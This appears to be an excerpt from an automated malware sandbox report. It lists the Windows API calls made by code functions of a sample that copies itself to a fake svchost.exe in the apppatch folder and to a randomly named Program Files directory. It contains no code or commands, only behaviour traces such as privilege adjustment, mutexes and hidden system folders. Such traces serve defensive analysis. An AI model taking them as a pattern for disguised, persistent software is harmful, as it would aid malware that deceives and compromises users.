Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,0_2_00402D30
Source: C:\Windows\apppatch\svchost.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,2_2_00403A20
Source: C:\Windows\apppatch\svchost.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,2_2_00402D30
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,2_2_02655720
Source: C:\Windows\apppatch\svchost.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,2_2_02647FD0
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,2_2_02656CA0
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,StrStrIA,2_2_02662B40
Source: C:\Windows\apppatch\svchost.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,2_2_02662BB0
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,2_2_0264D970
Source: C:\Windows\apppatch\svchost.exeCode function: memset,VirtualQuery,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,2_2_02641170
Source: C:\Windows\apppatch\svchost.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,2_2_02641660
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,2_2_02643610
Source: C:\Windows\apppatch\svchost.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,2_2_0265CE10
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,2_2_02661690
Source: C:\Windows\apppatch\svchost.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,2_2_02663F50
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,2_2_02661460
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,2_2_02663CE0
Source: C:\Windows\apppatch\svchost.exeCode function: GetUserNameA,memset,StrStrIA,2_2_0265ADE0
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,2_2_026625C0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,5_2_01336CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,5_2_01321170
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,5_2_0132D970
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,StrStrIA,5_2_01342B40
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,5_2_01342BB0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetUserNameA,memset,StrStrIA,5_2_0133ADE0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,5_2_013425C0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,5_2_01341460
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,5_2_01343CE0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,5_2_01335720
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,5_2_01343F50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,5_2_01327FD0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,5_2_01323610
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,5_2_0133CE10
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,5_2_01321660
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,5_2_01341690
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,6_2_013F6CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,6_2_013E1170
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,6_2_013ED970
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,StrStrIA,6_2_01402B40
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,6_2_01402BB0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,6_2_014025C0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetUserNameA,memset,StrStrIA,6_2_013FADE0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,6_2_01401460
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,6_2_01403CE0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,6_2_01403F50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,6_2_013F5720
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,6_2_013E7FD0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,6_2_013E3610
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,6_2_013FCE10
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,6_2_013E1660
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,6_2_01401690
